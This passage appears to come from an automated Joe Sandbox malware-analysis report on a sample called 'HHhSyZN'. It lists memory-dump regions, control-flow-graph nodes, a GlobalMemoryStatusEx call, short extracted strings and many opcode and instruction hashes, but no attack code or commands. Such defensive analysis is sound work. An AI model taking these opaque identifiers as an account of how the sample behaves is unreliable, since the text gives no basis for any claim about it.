                                                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2125118731

                                                                                                                Control-flow Graph

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: fcq$XPcq$\Ocq
                                                                                                                • API String ID: 0-3575482020

                                                                                                                Control-flow Graph

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q
                                                                                                                • API String ID: 0-355816377

                                                                                                                Control-flow Graph

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q
                                                                                                                • API String ID: 0-355816377

                                                                                                                Control-flow Graph

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4149511246.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_1500000_HHhSyZN.jbxd

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1404 150ec18-150ec56 1405 150ec5e-150ec8c GlobalMemoryStatusEx 1404->1405 1406 150ec95-150ecbd 1405->1406 1407 150ec8e-150ec94 1405->1407 1407->1406
                                                                                                                APIs
                                                                                                                • GlobalMemoryStatusEx.KERNEL32 ref: 0150EC7F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4149511246.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_1500000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: GlobalMemoryStatus
                                                                                                                • String ID:
                                                                                                                • API String ID: 1890195054-0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: XPcq
                                                                                                                • API String ID: 0-714321711
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PH^q
                                                                                                                • API String ID: 0-2549759414
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PH^q
                                                                                                                • API String ID: 0-2549759414
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PH^q
                                                                                                                • API String ID: 0-2549759414
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PH^q
                                                                                                                • API String ID: 0-2549759414
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0bd4a967ea611bfa5b76884f8cec29cabeef5aca133810f3bc13e87a99050409
                                                                                                                • Instruction ID: acc4a7cb901b961bef252d60e0054c5050a910b6517b793ae3392e4530a4b5f9
                                                                                                                • Opcode Fuzzy Hash: 0bd4a967ea611bfa5b76884f8cec29cabeef5aca133810f3bc13e87a99050409
                                                                                                                • Instruction Fuzzy Hash: CEB1B175F002159BDB14DFB4D8946AEB7B6FB88318F608429E806AB354DF34ED46CB81
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 296116c074ce5868fc1268bffa5d7cfbc4b84e590fb8e5165d4de6868208102b
                                                                                                                • Instruction ID: b17bcc1afddeac8630ff7c1584cd75c19870327507622715acbbd6cfadbb2b88
                                                                                                                • Opcode Fuzzy Hash: 296116c074ce5868fc1268bffa5d7cfbc4b84e590fb8e5165d4de6868208102b
                                                                                                                • Instruction Fuzzy Hash: 33A19B34A00305CFCB64DB69D588A6EB7F2FF84358F588469E40AAB354DB36ED45CB90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ce0af518f8d7a367a99b3eec87c0f0fd1714aa23e84d289b0894b731a419156f
                                                                                                                • Instruction ID: d99aca80e41a5c6ba9dcc4bfb019839d69d57b88a8d261b91a419c6e8050616f
                                                                                                                • Opcode Fuzzy Hash: ce0af518f8d7a367a99b3eec87c0f0fd1714aa23e84d289b0894b731a419156f
                                                                                                                • Instruction Fuzzy Hash: 0361C071F001224FCB509A7EC88866FAAD7AFC5624B1A413AD80EDB364DE65DD0287C2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 29ed514fca98a21cba45ea1f0651f109c374e53d652f751e51502a53ca7e7dd1
                                                                                                                • Instruction ID: de153d0bd17884036cf48c558e148ea547e54375110bf7b4a99073bea7214699
                                                                                                                • Opcode Fuzzy Hash: 29ed514fca98a21cba45ea1f0651f109c374e53d652f751e51502a53ca7e7dd1
                                                                                                                • Instruction Fuzzy Hash: 4F813D30B0020A9FDF58DFA9D59466EB7F6EF89304F108429D40AEB394EB74DD428B91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1e8478d197b40130b8bd63ea12227f76a5f65b77c788350a900d8a34479432c1
                                                                                                                • Instruction ID: b25c90764553b43a4cbbf77457576c621683e53c84ed21433f9d044f32baf418
                                                                                                                • Opcode Fuzzy Hash: 1e8478d197b40130b8bd63ea12227f76a5f65b77c788350a900d8a34479432c1
                                                                                                                • Instruction Fuzzy Hash: 14813C30B0020A9FDF58DFA9D59465EB7F6EB89304F108429D40AEB394EF74ED428B91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f521f86fef2d38eb459177f514f8d347b9dd283b418b714e2926f5c2ada4b6c0
                                                                                                                • Instruction ID: 5f62b20d5294ae0fbcc21056d48d194608ef4c389e427347393ae882b4ab2610
                                                                                                                • Opcode Fuzzy Hash: f521f86fef2d38eb459177f514f8d347b9dd283b418b714e2926f5c2ada4b6c0
                                                                                                                • Instruction Fuzzy Hash: 68814035B002069FDF58DFA8D5946AEB7F6EF89304F108429D40AEB394EB74DD428B41
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0f3999a167a4c5dec9b7edeb59bef891cebdc96d1b8868168a1c760a26cde0d9
                                                                                                                • Instruction ID: 65c6e99cdfb8f1e5ff1266bfdb7400217356217e9293b99f4cfef3e2d23e6cab
                                                                                                                • Opcode Fuzzy Hash: 0f3999a167a4c5dec9b7edeb59bef891cebdc96d1b8868168a1c760a26cde0d9
                                                                                                                • Instruction Fuzzy Hash: 33714C31E0031A8FDF55DFA9D4946AEB7B2FF85308F108629D409AB354EB74DD468B81
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ff79d5e099587bd05cf55c3767249b1e794502cb29935392922aa5ce8c677569
                                                                                                                • Instruction ID: 2a17b4aee95a40dc0ffd5fa358e5e1857499e9e2960c0790cbbc1e3f4a569b39
                                                                                                                • Opcode Fuzzy Hash: ff79d5e099587bd05cf55c3767249b1e794502cb29935392922aa5ce8c677569
                                                                                                                • Instruction Fuzzy Hash: 42913C30E1021A8BDF64DF68C980B9DB7B1FF89314F20C599D549AB354EB70AA85CB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4149107630.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_14bd000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d7e3d26f3c14853bf338f8dd61faccf527ca47f7a56a460ada493bd89fb9cb68
                                                                                                                • Instruction ID: 09b22833e784234d96fe3043e10c1852e13b36def0870833e043af9cc87cecc2
                                                                                                                • Opcode Fuzzy Hash: d7e3d26f3c14853bf338f8dd61faccf527ca47f7a56a460ada493bd89fb9cb68
                                                                                                                • Instruction Fuzzy Hash: C001447AB012110FDBA0EAB8E45472F73D6DB8A614F10883DE10EDB300EE31DD428380
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 82daaa50c3118d8cebdf9a15559300c4ed7fcdda720b192f3df225644d8f7ade
                                                                                                                • Instruction ID: 782d7086e90fbab13e4aeb658c816a2e2888bee461abcd9771a9a28909e960c0
                                                                                                                • Opcode Fuzzy Hash: 82daaa50c3118d8cebdf9a15559300c4ed7fcdda720b192f3df225644d8f7ade
                                                                                                                • Instruction Fuzzy Hash: AC01D134B012151FDB60EAB9E454B2EB7DAEB8A614F10883CE10ACB340EE25DC428384
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b79764c03e70a3df11bbb87c664137746f195a9893efb76afe42ed39b630e335
                                                                                                                • Instruction ID: 66d0742146535459e037f5868fb4af80dd0a23a300643fd9b52ed80315a85019
                                                                                                                • Opcode Fuzzy Hash: b79764c03e70a3df11bbb87c664137746f195a9893efb76afe42ed39b630e335
                                                                                                                • Instruction Fuzzy Hash: 2701F935E112259FDF54AA79E944A9EB776FB84314F00403EE905FB344D7319D0487C0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 23f27c89fdfc1b95888c561ec88c4dfaba2a25cc0373f8cf4987b76911f2f770
                                                                                                                • Instruction ID: 6cbddf40b73e1510a5e4bb50e8aaaf822f64b6da0c1f04d9e16881b111f8bb38
                                                                                                                • Opcode Fuzzy Hash: 23f27c89fdfc1b95888c561ec88c4dfaba2a25cc0373f8cf4987b76911f2f770
                                                                                                                • Instruction Fuzzy Hash: C0F0F874A0520A8FD780FFBCD91426EBBE6EB89204F50417E8919D7358FB70D951CB92
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b1e4d1d0e0239d94ad5c8150abef5ce9cc382e3732ad53e4c4ecdfa255f5cb5f
                                                                                                                • Instruction ID: caca3d19e83f570309681b60e2f3afffefc84fe456d01fbf0104157e442bccf4
                                                                                                                • Opcode Fuzzy Hash: b1e4d1d0e0239d94ad5c8150abef5ce9cc382e3732ad53e4c4ecdfa255f5cb5f
                                                                                                                • Instruction Fuzzy Hash: F1E0C270E1034AABDF60CEB5C915B5AB3ADD70120CF2488B8D408C7201E172CF018380
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c4cf5273b10736d61f85677db980052fdaba009d3335e2fd0ff260dfbcf63c12
                                                                                                                • Instruction ID: b9e6751e7c91bea150a80a78af18e660f1bfebf356ad930d2762d11c89f6cbdc
                                                                                                                • Opcode Fuzzy Hash: c4cf5273b10736d61f85677db980052fdaba009d3335e2fd0ff260dfbcf63c12
                                                                                                                • Instruction Fuzzy Hash: 95E0CD70E1424697EF50CEB5C72475B73A9D74020CF248879D808D7201E135CF019380
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2222239885
                                                                                                                • Opcode ID: a44cc7dd4dc541fc7d635aee753ee629f61bb1b0f8433d0cbb45b9ae75c031d4
                                                                                                                • Instruction ID: e0f2527b963eb93a29a8b1db4ee62bba36a3faf100b68afa185c18c4276df6e8
                                                                                                                • Opcode Fuzzy Hash: a44cc7dd4dc541fc7d635aee753ee629f61bb1b0f8433d0cbb45b9ae75c031d4
                                                                                                                • Instruction Fuzzy Hash: 15122D34E0031A8FDB68DF69C954AAEB7F6BF88304F208569D409AB354DB309D85CF91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-3823777903
                                                                                                                • Opcode ID: 58aa07c5f145bcbefc9d74fc98f04c9e1a2aba456f02963615cd36e35484cc79
                                                                                                                • Instruction ID: 07ace5e8e7ab072aca7515777105e134b33b6e914b476404c603f7d2fc687593
                                                                                                                • Opcode Fuzzy Hash: 58aa07c5f145bcbefc9d74fc98f04c9e1a2aba456f02963615cd36e35484cc79
                                                                                                                • Instruction Fuzzy Hash: 0C913D30E0030A9FEB68EFA5D554B6EBBF6BF84308F108529E401AB294DB759D45CB90
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-390881366
                                                                                                                • Opcode ID: 5d86fbe3c808facd0574aa4290841d6e498a9a63820329d634dcfa7431aa0506
                                                                                                                • Instruction ID: 24124d3018a48c569d4061be23980a77c76fcab3c60e4ff5f9984fe422265001
                                                                                                                • Opcode Fuzzy Hash: 5d86fbe3c808facd0574aa4290841d6e498a9a63820329d634dcfa7431aa0506
                                                                                                                • Instruction Fuzzy Hash: 97F14D34A0130ACFDB59EFA9D594A6EBBB6FF84304F108529D405AB3A8DB35DC46CB50
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2125118731
                                                                                                                • Opcode ID: 718afa2b1041b248eb888348cf7bc05b4db11cc7a267350731f9086d0cb02329
                                                                                                                • Instruction ID: 7e2eaada978b7d8a1896b89297bb31814c6ddfdf73e8f0510fcdb7da112ab105
                                                                                                                • Opcode Fuzzy Hash: 718afa2b1041b248eb888348cf7bc05b4db11cc7a267350731f9086d0cb02329
                                                                                                                • Instruction Fuzzy Hash: 68B14E30A1130A8FDB54DFA9D59466EBBB6FF84304F248829D406EB395DB35DD86CB80
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: LR^q$LR^q$$^q$$^q
                                                                                                                • API String ID: 0-2454687669
                                                                                                                • Opcode ID: 9f5f89ec6530ad6d46263e7666778a5f9e07ac820a2edaf2091ad6d9d1aa9f4d
                                                                                                                • Instruction ID: cd99cebddcab9b7343437a03197de029795660a935fc91dac109eb31ec4ec469
                                                                                                                • Opcode Fuzzy Hash: 9f5f89ec6530ad6d46263e7666778a5f9e07ac820a2edaf2091ad6d9d1aa9f4d
                                                                                                                • Instruction Fuzzy Hash: 3751B131B013069FDB58EF79D954A6AB7E6FF84304B10856DE405EB3A9DA30EC45CB90
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2125118731
                                                                                                                • Opcode ID: 027dce95b3f900d996189c0e6a10a9a262eefd3f0fd890464ca9fd7a1a5428dc
                                                                                                                • Instruction ID: f72d82882100821989d9bfb580feac74d2962e0a8dd98b31f5565352edbeb630
                                                                                                                • Opcode Fuzzy Hash: 027dce95b3f900d996189c0e6a10a9a262eefd3f0fd890464ca9fd7a1a5428dc
                                                                                                                • Instruction Fuzzy Hash: 40F0C230F102191BCF689A38D864A6E7BAADB85304F20453DD406EB348EA61DC0687C1